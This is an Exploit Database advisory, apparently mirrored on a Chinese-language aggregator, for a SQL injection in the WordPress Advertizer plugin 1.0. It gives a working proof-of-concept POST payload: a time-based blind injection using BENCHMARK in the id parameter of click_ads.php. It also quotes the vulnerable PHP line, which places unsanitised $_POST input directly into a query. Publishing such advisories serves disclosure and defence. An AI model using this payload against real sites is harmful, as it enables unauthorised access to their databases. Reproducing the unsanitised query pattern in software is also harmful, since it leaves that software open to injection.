WordPress Plugin Advertizer 1.0 – SQL Injection

• Exploit Database
• 130 阅读

• 作者： Miroslav Stampar
  日期： 2011-08-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17750/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

  # Exploit Title: WordPress Advertizer plugin <= 1.0 SQL Injection Vulnerability # Date: 2011-08-29 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/advertizer.1.0.zip # Version: 1.0 (tested) # Note: magic_quotes has to be turned off   --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/advertizer/click_ads.php id=-1&apos; AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20   --------------- Vulnerable code --------------- $res = $wpdb->get_row("SELECT <code>limit_clicks</code>, <code>trace_clicks</code> FROM <code>".$wpdb->prefix."adv_v_base</code> WHERE <code>id</code> = &apos;".$_POST[id]."&apos; limit 1;");